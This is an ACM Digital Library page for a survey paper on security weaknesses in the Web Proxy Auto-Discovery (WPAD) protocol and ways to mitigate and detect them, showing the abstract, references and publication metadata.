survey

WPAD: Waiting Patiently for an Announced Disaster

Authors:
Elyssa Boulila

EURECOM, Biot, France

EURECOM, Biot, France

0000-0003-4690-7129
View Profile

,
Marc Dacier

KAUST, Thuwal, Kingdom of Saudi Arabia

KAUST, Thuwal, Kingdom of Saudi Arabia

0000-0003-3206-2030
View Profile

Authors Info & Claims

ACM Computing Surveys Volume 55 Issue 10Article No.: 217pp 1–29https://doi.org/10.1145/3565361

Published:02 February 2023Publication History

ACM Computing Surveys

Abstract

The Web Proxy Auto-Discovery protocol (wpad ¹) is widely used despite being flawed. Its purpose is to enable a client machine to autonomously identify an appropriate proxy, if any, to connect to. This can be useful in corporate networks, for example. Its vulnerabilities range from enabling an attacker to execute code remotely on client machines, to carry out SSL MITM attacks, to subvert Windows NTLM authentication, or even to steal Google authentication tokens. Several publications, talks, and blog posts have tried to raise awareness about some of these security issues. 23 distinct CVEs have been published. Nevertheless, wpad runs by default on Windows machines, and most users are unaware of its existence. Our goal is to offer within a single publication a survey of all the known vulnerabilities surrounding wpad, a presentation of some novel threats related to this protocol, as well as a description of mitigation and detection techniques to prevent the exploitation of its vulnerabilities. We hope that this publication will be an eye opener for all those concerned with the security of their networks and that the offered mitigation techniques will help them to deal with the numerous threats that wpad brings to their environments.

REFERENCES

[1] Aboba B. and Cheshire S.. 2002. Dynamic Host Configuration Protocol (DHCP) Domain Search Option. RFC 3397. RFC Editor.Google ScholarDigital Library
[2] Aboba B., Thaler D., and Esibov L.. 2007. Link-local Multicast Name Resolution (LLMNR). RFC 4795. RFC Editor.Google ScholarDigital Library
[3] Agar Richard John Matthew. 2010. The Domain Name System (DNS): Security Challenges and Improvements. Technical Report. Tech. rep., Royal Holloway, University of London.Google Scholar
[4] Alexander Steve and Droms Ralph. 1997. DHCP Options and BOOTP Vendor Extensions. RFC 2132. RFC Editor.Google ScholarDigital Library
[5] Alonso C.. 2013. Fear the Evil FOCA attacking internet connections with IPv6. DEF CON. Retrieved October 31, 2022, from https://media.defcon.org/DEF%20CON%2021/DEF%20CON%2021%20presentations/DEF%20CON%2021%20-%20Alonso-Fear-the-Evil-FOCA-Updated.pdf.Google Scholar
[6] Assolini Fabio and Makhnutin Andrey. 2013. PAC – the Problem Auto Config. Retrieved from https://securelist.com/pac-the-problem-auto-config/57891/. Accessed 31 October 2022.Google Scholar
[7] Atul K. R. and Jevitha K. P.. 2017. Prevention of PAC file based attack using DHCP snooping. In Proceedings of the Security in Computing and Communications. Thampi Sabu M., Pérez Gregorio Martínez, Westphall Carlos Becker, Hu Jiankun, Fan Chun I., and Mármol Félix Gómez (Eds.), Springer Singapore, Singapore, 195–204.Google ScholarCross Ref
[8] Bacurio Floser, Joven Rommel, and Paz Roland Dela. 2016. Over 100,000 South Korean Users Affected by BlackMoon Campaign. Retrieved from https://www.fortinet.com/blog/threat-research/over-100-000-south-korean-users-affected-by-blackmoon-campaign. Accessed 31 October 2022.Google Scholar
[9] Bem Daniel Josef. 1992. NASK–research and academic computer network in Poland. Computer Networks and ISDN Systems 25, 4–5 (1992), 431–437.Google ScholarDigital Library
[10] Breen Stephen. 2016. Hot Potato—Windows Privilege Escalation. Retrieved from https://foxglovesecurity.com/2016/01/16/hot-potato/. Accessed 31 October 2022.Google Scholar
[11] Bugzilla. 2016. Retrieved from https://bugzilla.mozilla.org/show_bug.cgi?id=1255474. Accessed 31 October 2022.Google Scholar
[12] CERT US. 2009. Alert (TA09-069A). Retrieved from https://us-cert.cisa.gov/ncas/alerts/TA09-069A. Accessed 31 October 2022.Google Scholar
[13] CERT US. 2012. Alert (TA12-318A). Retrieved from https://us-cert.cisa.gov/ncas/alerts/TA12-318A. Accessed 31 October 2022.Google Scholar
[14] Cert US. 2016. WPAD Name Collision Vulnerability. Retrieved from https://us-cert.cisa.gov/ncas/alerts/TA16-144A. Accessed 31 October 2022.Google Scholar
[15] Chandra Ranveer, Padmanabhan Venkata N., and Zhang Ming. 2006. WiFiProfiler: Cooperative diagnosis in wireless LANs. In Proceedings of the 4th International Conference on Mobile Systems, Applications and Services.Association for Computing Machinery, New York, NY, 205–219. DOI:DOI:Google ScholarDigital Library
[16] Chapman Alex and Stone Paul. 2016. Toxic Proxies: Bypassing HTTPS & VPNs to pwn your online identity. DEF CON 24, DEF CON, 2016. Retrieved October 31, 2022, from Google ScholarCross Ref
[17] Chen Qi Alfred, Osterweil Eric, Thomas Matthew, and Mao Z. Morley. 2016. MitM attack by name collision: Cause analysis and vulnerability assessment in the new gTLD era. In Proceedings of the 2016 IEEE Symposium on Security and Privacy. IEEE, 675–690. DOI:DOI:Google ScholarCross Ref
[18] Chen Qi Alfred, Thomas Matthew, Osterweil Eric, Cao Yulong, You Jie, and Mao Z. Morley. 2017. Client-side name collision vulnerability in the new gtld era: A systematic study. In Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security. ACM, 941–956.Google ScholarDigital Library
[19] Chen Shuo, Mao Ziqing, Wang Yi-Min, and Zhang Ming. 2009. Pretty-bad-proxy: An overlooked adversary in browsers’ https deployments. In Proceedings of the 2009 30th IEEE Symposium on Security and Privacy. IEEE, 347–359. Accessed 31 October 2022.Google ScholarDigital Library
[20] Chromium Bugs. 2018. 899126 - chromium - An open-source project to help move the web forward. - Monorail. Retrieved from https://bugs.chromium.org/p/chromium/issues/detail?id=899126. Accessed 31 October 2022.Google Scholar
[21] Evans Shawn. 2020. Responder: Beyond WPAD \(\bullet\) NopSec. Retrieved from https://www.nopsec.com/responder-beyond-wpad/. Accessed 31 October 2022.Google Scholar
[22] Evdokimov Leonid. 2015. Can Web Proxy Autodiscovery leak HTTPS URLs?Retrieved from https://security.stackexchange.com/questions/87499/can-web-proxy-autodiscovery-leak-https-urls. Accessed 31 October 2022.Google Scholar
[23] Farrah Dhia and Dacier Marc. 2021. Zero conf protocols and their numerous man in the middle (MITM) attacks. In Proceedings of the 2021 IEEE Security and Privacy Workshops. IEEE, 410–421.Google ScholarCross Ref
[24] Fillinger Max and Stevens Marc. 2015. Reverse-engineering of the cryptanalytic attack used in the flame super-malware. In Proceedings of the International Conference on the Theory and Application of Cryptology and Information Security. Springer, 586–611.Google ScholarDigital Library
[25] Fratric Ivan, Dullien Thomas, Forshaw James, and Vittitoe Steven. 2017. Retrieved from https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html. Accessed 31 October 2022.Google Scholar
[26] Gauthier Paul, Cohen Josh, Dunsmuir Martin, and Perkins Charles E.. 1999. Web Proxy Auto-Discovery Protocol. Internet-Draft draft-ietf-wrec-wpad-01. IETF Secretariat. Retrieved from https://www.ietf.org/archive/id/draft-ietf-wrec-wpad-01.txt. Accessed 31 October 2022.Google Scholar
[27] Glass Eric. [n. d.]. The NTLM Authentication Protocol and Security Support Provider. Retrieved from https://curl.se/rfc/ntlm.html. Accessed 31 October 2022.Google Scholar
[28] Golubovic Nicolas. 2016. Attacking browser extensions. Ruhr-Universitat Bochum 3 (2016).Google Scholar
[29] Goncharov Maxime. 2016. badWPAD - The Lasting Menace of a Bad Protocol. Retrieved from https://www.trendmicro.com/vinfo/pl/security/news/vulnerabilities-and-exploits/badwpad-menace-of-a-bad-protocol. Accessed 31 October 2022.Google Scholar
[30] Grégio André Ricardo A, Fernandes Dario Simões, Afonso Vitor Monte, Geus Paulo Lício de, Martins Victor Furuse, and Jino Mario. 2013. An empirical analysis of malicious internet banking software behavior. In Proceedings of the 28th Annual ACM Symposium on Applied Computing. ACM, 1830–1835.Google ScholarDigital Library
[31] Guttman E., Perkins C., and Kempf J.. 1999. Service Templates and Service: Schemes. RFC 2609. RFC Editor.Google ScholarDigital Library
[32] Guttman Erik, Perkins Charles, Veizades John, and Day Michael. 1999. Service Location Protocol, Version 2. RFC 2608. RFC Editor. Retrieved from http://www.rfc-editor.org/rfc/rfc2608.txt.http://www.rfc-editor.org/rfc/rfc2608.txt.Google ScholarDigital Library
[33] Habeeb Richard. 2014. IPv6 SLAAC MITM attack process and mitigation. (2014). CIS 551, Computer Security.Google Scholar
[34] Dick Hardt. 2012. The OAuth 2.0 authorization framework. Technical Report. RFC 6749, IETF.Google Scholar
[35] Hawkes Ben. 2019. Project Zero: Five Years of’Make 0Day Hard’. Retrieved from https://www.blackhat.com/us-19/briefings/schedule/#project-zero-five-years-of-make-day-hard-15900. Accessed 31 October 2022.Google Scholar
[36] Hayes Peter. [n. d.]. Browser Support. Retrieved March, 30 2021 from https://findproxyforurl.com/browser-support/. Accessed 31 October 2022.Google Scholar
[37] Huang Lin Shung, Rice Alex, Ellingsen Erling, and Jackson Collin. 2014. Analyzing forged SSL certificates in the wild. In Proceedings of the 2014 IEEE Symposium on Security and Privacy. IEEE, IEEE, 83–97. Accessed 31 October 2022.Google ScholarDigital Library
[38] ICANN. 2013. New Generic Top-Level Domains. Retrieved from https://newgtlds.icann.org/en/about/program.Google Scholar
[39] Agency NetBIOS Working Group in the Defense Advanced Research Projects. 1987. Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Concepts and Methods. STD 19. RFC Editor.Google Scholar
[40] Ishibashi Keisuke, Toyono Tsuyoshi, Toyama Katsuyasu, Ishino Masahiro, Ohshima Haruhiko, and Mizukoshi Ichiro. 2005. Detecting mass-mailing worm infected hosts by mining DNS traffic data. In Proceedings of the 2005 ACM SIGCOMM Workshop on Mining Network Data. 159–164.Google ScholarDigital Library
[41] IT Fox. 2017. Relaying credentials everywhere with ntlmrelayx. Retrieved from https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/. Accessed 31 October 2022.Google Scholar
[42] Jaganathan K., Zhu L., and Brezak J.. 2006. SPNEGO-based Kerberos and NTLM HTTP Authentication in Microsoft Windows. RFC 4559. RFC Editor.Google ScholarDigital Library
[43] Kerrich Mohamed Amine, Addaim Adnane, and Damej Loubna. 2019. Proposed solution for HID fileless ransomware using machine learning. In Proceedings of the International Conference on Advanced Communication Systems and Information Security. Springer, 180–192.Google Scholar
[44] Klein Amit and Kotler Itzik. 2016. Crippling HTTPS with unholy PAC. Retrieved from https://www.blackhat.com/us-16/briefings/schedule/#crippling-https-with-unholy-pac-3778. Accessed 31 October 2022.Google Scholar
[45] Kulberg Mikael. 2018. Retrieved from https://www.cybersecobservatory.com/wp-content/uploads/2018/04/spring-2018-state-of-the-internet-security-report.pdf. Accessed 31 October 2022.Google Scholar
[46] Laprade Craig, Bowman Benjamin, and Huang H. Howie. 2020. PicoDomain: A compact high-fidelity cybersecurity dataset. arXiv:2008.09192. Retrieved October 31, 2022, from https://arxiv.org/abs/2008.09192.Google Scholar
[47] Li Dan, Liu Chaoge, Cui Xu, and Cui Xiang. 2013. POSTER: Sniffing and propagating malwares through WPAD deception in LANs. In Proceedings of the 2013 ACM SIGSAC Conference on Computer & Communications Security. Association for Computing Machinery, New York, NY, 1437–1440. DOI:DOI:Google ScholarDigital Library
[48] LilyPond. [n. d.]. LilyPond. Retrieved July 21, 2022 from https://lilypond.org. Accessed 31 October 2022.Google Scholar
[49] Ltd Elsevier. 2010. PAC attack redirects browsers to malicious sites using proxy hack. Network Security 2010, 4 (2010), 2–20. DOI:DOI:Google ScholarCross Ref
[50] Manpages Debian. [n. d.]. Package: Sensible-utils (0.0.17 and others). Retrieved July 21, 2022 from https://packages.debian.org/en/sid/sensible-utils. Accessed 31 October 2022.Google Scholar
[51] Manpages Debian. [n. d.]. sensible-browser - sensible-utils - Debian Manpages. Retrieved July 21, 2022 from https:// manpages.debian.org/stretch/sensible-utils/sensible-browser.1.en.html. Accessed 31 October 2022.Google Scholar
[52] Microsoft. 1999. Microsoft Security Bulletin MS99-054 - Critical. Retrieved from https://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-054. Accessed 31 October 2022.Google Scholar
[53] Microsoft. 2007. Microsoft Security Advisory 945713. Retrieved from https://docs.microsoft.com/en-us/security-updates/securityadvisories/2007/945713. Accessed 31 October 2022.Google Scholar
[54] Microsoft. 2009. Retrieved from https://msrc-blog.microsoft.com/tag/ms09-008/. Accessed 31 October 2022.Google Scholar
[55] Microsoft. 2009. Microsoft Security Advisory 971888. Retrieved from https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2009/971888?redirectedfrom=MSDN. Accessed 31 October 2022.Google Scholar
[56] Microsoft. 2012. Microsoft Security Bulletin MS12-074 - Critical. Retrieved from https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-074. Accessed 31 October 2022.Google Scholar
[57] Microsoft. 2017. Microsoft Security Bulletin MS16-063 - Critical. Retrieved from https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-063. Accessed 31 October 2022.Google Scholar
[58] Microsoft. 2017. Microsoft Security Bulletin MS16-077 - Important. Retrieved from https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077. Accessed 31 October 2022.Google Scholar
[59] MITRE. 1999. CVE-1999-0858. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0858. Accessed 31 October 2022.Google Scholar
[60] MITRE. 2007. CVE-2007-1692. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1692. Accessed 31 October 2022.Google Scholar
[61] MITRE. 2007. CVE-2007-5355. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5355. Accessed 31 October 2022.Google Scholar
[62] MITRE. 2009. CVE-2009-0093. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0093. Accessed 31 October 2022.Google Scholar
[63] MITRE. 2009. CVE-2009-0094. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0094. Accessed 31 October 2022.Google Scholar
[64] MITRE. 2009. CVE-2009-3372. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3372. Accessed 31 October 2022.Google Scholar
[65] MITRE. 2012. CVE-2012-2915. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2915. Accessed 31 October 2022.Google Scholar
[66] MITRE. 2012. CVE-2012-4504. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4504. Accessed 31 October 2022.Google Scholar
[67] MITRE. 2012. CVE-2012-4505. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4505. Accessed 31 October 2022.Google Scholar
[68] MITRE. 2012. CVE-2012-4776. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4776. Accessed 31 October 2022.Google Scholar
[69] MITRE. 2012. CVE-2012-5580. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5580. Accessed 31 October 2022.Google Scholar
[70] MITRE. 2016. CVE-2016-3213. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213. Accessed 31 October 2022.Google Scholar
[71] MITRE. 2016. CVE-2016-3236. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3236. Accessed 31 October 2022.Google Scholar
[72] MITRE. 2017. CVE-2017-17512. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17512. Accessed 31 October 2022.Google Scholar
[73] MITRE. 2017. CVE-2017-17523. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17523. Accessed 31 October 2022.Google Scholar
[74] MITRE. 2017. CVE-2017-5384. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5384. Accessed 31 October 2022.Google Scholar
[75] MITRE. 2017. CVE-2017-6410. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6410. Accessed 31 October 2022.Google Scholar
[76] MITRE. 2018. CVE-2018-10992. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10992. Accessed 31 October 2022.Google Scholar
[77] MITRE. 2018. CVE-2018-18358. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18358. Accessed 31 October 2022.Google Scholar
[78] MITRE. 2018. CVE-2018-18506. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18506. Accessed 31 October 2022.Google Scholar
[79] MITRE. 2019. CVE-2019-8454. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8454. Accessed 31 October 2022.Google Scholar
[80] MITRE. 2020. CVE-2020-26154. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26154. Accessed 31 October 2022.Google Scholar
[81] MITRE. 2021. CVE-2021-0393. Retrieved from https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-0393. Accessed 31 October 2022.Google Scholar
[82] David Moher, Alessandro Liberati, Jennifer Tetzlaff, Douglas G. Altman, and the PRISMA Group. 2009. Preferred reporting items for systematic reviews and meta-analyses: The PRISMA statement. PLoS Medicine 6, 7 (2009), e1000097.Google ScholarCross Ref
[83] Mollema Dirk-Jan. 2017. MITM6: Compromising IPv4 networks via IPv6 - Fox-IT. Retrieved from https://www.fox-it.com/en/news/blog/mitm6-compromising-ipv4-networks-via-ipv6/. Accessed 31 October 2022.Google Scholar
[84] Moore HD. 2010. Tactical exploitation. Course Slides], Black Hat USA (2010).Google Scholar
[85] Mozilla. 2017. Security vulnerabilities fixed in Firefox 51. Retrieved from https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/. Accessed 31 October 2022.Google Scholar
[86] Osterweil Eric M., McPherson Danny R., Thomas Matthew A., and Chen Qi Alfred. 2020. Detecting and remediating highly vulnerable domain names using passive DNS measurements. US Patent 10,652,271.Google Scholar
[87] Pashalidis Andreas. 2003. A cautionary note on automatic proxy configuration. In Proceedings of the IASTED International Conference on Communication, Network, and Information Security. Citeseer, 153–158.Google Scholar
[88] Patton Samuel, Yurcik William, and Doss David. 2001. An Achilles’ heel in signature-based IDS: Squealing false positives in SNORT. In Proceedings of RAID. Citeseer.Google Scholar
[89] Paxson Vern. 1999. Bro: A system for detecting network intruders in real-time. Computer Networks 31, 23–24 (1999), 2435–2463.Google ScholarDigital Library
[90] project Zeek. [n. d.]. The Zeek network intrusion detection monitor. Retrieved July 09, 2021 from https://zeek.org. Accessed 31 October 2022.Google Scholar
[91] Rafiee Hosnieh. 2015. Multicast DNS (mDNS) Threat Model and Security Consideration. Internet-Draft draft-rafiee-dnssd-mdns-threatmodel-03. IETF Secretariat. Retrieved from http://www.ietf.org/internet-drafts/draft-rafiee-dnssd-mdns-threatmodel-03.txt. Accessed 31 October 2022.Google Scholar
[92] Security Farsight. 2021. Farsight DNSDB API Documentation. Retrieved from https://docs.dnsdb.info/. Accessed 31 October 2022.Google Scholar
[93] Security Stern. 2013. Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved from https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning/. Accessed 31 October 2022.Google Scholar
[94] Sermersheim J.. 2006. Lightweight Directory Access Protocol (LDAP): The Protocol. RFC 4511. RFC Editor. Retrieved from http://www.rfc-editor.org/rfc/rfc4511.txt. Accessed 31 October 2022.Google ScholarDigital Library
[95] Siddiqui Farhan, Zeadally Sherali, Kacem Thabet, and Fowler Scott. 2012. Zero configuration networking: Implementation, performance, and security. Computers and Electrical Engineering 38, 5 (2012), 1129–1145.Google ScholarDigital Library
[96] Templin F., Gleeson T., Talwar M., and Thaler D.. 2005. Intra-Site Automatic Tunnel Addressing Protocol (ISATAP). RFC 4214. RFC Editor.Google ScholarDigital Library
[97] Teusink Niels. 2008. Hacking random clients using WPAD. Retrieved from http://blog.teusink.net/2008/11/about-two-weeks-ago-i-registered-wpad.html. Accessed 31 October 2022.Google Scholar
[98] Verisign. 2016. White paper: Enterprise remediation for WPAD name collision vulnerability. (May2016). Retrieved from https://www.verisign.com/assets/Enterprise_Remediation_for_WPAD_Name_Collision_Vulnerability.pdf. Accessed 31 October 2022.Google Scholar
[99] Vissamsetty Venu, Lakshmanan Muthukumar, Penupolu Sreenivasa Sudheendra, and Rungta Ankur. 2019. Detecting man-in-the-middle attacks. US Patent 10,250,636.Google Scholar
[100] Wang Jianing and Zhou Junyu. 2018. NTLM Relay Is Dead, Long Live NTLM Relay. Retrieved from https://conference.hitb.org/hitbsecconf2018dxb/sessions/ntlm-relay-is-dead-long-live-ntlm-relay/. Accessed 31 October 2022.Google Scholar
[101] Yu Yang. 2016. BadTunnel: How Do I Get Big Brother Power?Retrieved from https://www.blackhat.com/us-16/briefings/schedule/#badtunnel-how-do-i-get-big-brother-power-3915. Accessed 31 October 2022.Google Scholar
[102] Yu Yang. 2016. BadTunnel: NetBIOS name service spoofing over the internet. Tencents Xuanwu Lab (2016).Google Scholar
[103] Zero Google Project. 2014. Issue 222: Windows: Local WebDAV NTLM Reflection Elevation of Privilege. Retrieved from https://bugs.chromium.org/p/project-zero/issues/detail?id=222&redir=1. Accessed 31 October 2022.Google Scholar
[104] Zhioua Sami. 2013. The middle east under malware attack dissecting cyber weapons. In Proceedings of the 2013 IEEE 33rd International Conference on Distributed Computing Systems Workshops. IEEE, 11–16.Google ScholarDigital Library
[105] Ziaja Adam. 2019. Retrieved from https://blog.redteam.pl/search?q=wpadblocking.com. Accessed 31 October 2022.Google Scholar

Index Terms

WPAD: Waiting Patiently for an Announced Disaster
1. Security and privacy
  1. Network security
    1. Web protocol security
  2. Systems security
    1. Browser security

Recommendations

A novel algorithm to prevent man in the middle attack in LAN environment
SpringSim '10: Proceedings of the 2010 Spring Simulation Multiconference

Secure web sites usually use HTTPS connection to secure transactions such as money transactions, online payment, and e-commerce. The use of HTTPS gives a sense of protection against attacks such as man in the middle (MITM) attack. This paper analyzes ...
Read More
Man-in-the-Middle Attack to the HTTPS Protocol

As defenders, it is extremely dangerous to be ignorant of how attackers can disrupt our systems. Without a good understanding of the relative ease of certain attacks, it's easy to adopt poor policies and procedures. A good example of this is the ...
Read More
Developing certificate-based projects for web security classes

Increasing number of applications are using the Internet to exchange data, varying from online chatting to credit card numbers and other sensitive information. Accompanying the widespread use of inter-networks is the ubiquitous problem of malicious ...
Read More

Comments

Login options

Check if you have access through your login credentials or your institution to get full access on this article.

Full Access

Get this Article

Published in
ACM Computing Surveys Volume 55, Issue 10
October 2023
772 pages
ISSN:0360-0300
EISSN:1557-7341
DOI:10.1145/3567475
Editor:
Albert Zomaya
University of Sydney, Australia
Issue’s Table of Contents
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected].
Sponsors
In-Cooperation
Publisher
Association for Computing Machinery
New York, NY, United States
Publication History
- Published: 2 February 2023
- Online AM: 7 October 2022
- Accepted: 21 September 2022
- Revised: 2 August 2022
- Received: 13 December 2021
Published in csur Volume 55, Issue 10

Permissions
Request permissions about this article.
Request Permissions

Check for updates
Author Tags
wpad security
web security
service discovery
proxy security
PAC file
javascript security
NTLM
HTTPS
MITM
SSL
remote code execution
Qualifiers
- survey
- Refereed
Conference
Funding Sources
Other Metrics
View Article Metrics

Article Metrics
- 0
  Total Citations
  View Citations
- 464
  Total Downloads
- Downloads (Last 12 months)168
- Downloads (Last 6 weeks)19
Other Metrics
View Author Metrics
Cited By
This publication has not been cited yet

PDF Format

View or Download as a PDF file.

PDF

eReader

View online with eReader.

eReader

Full Text

View this article in Full Text.

View Full Text

HTML Format

View this article in HTML Format .

View HTML Format

WPAD: Waiting Patiently for an Announced Disaster

ACM Computing Surveys

Abstract

REFERENCES

Cited By

Index Terms

Recommendations

A novel algorithm to prevent man in the middle attack in LAN environment

Man-in-the-Middle Attack to the HTTPS Protocol

Developing certificate-based projects for web security classes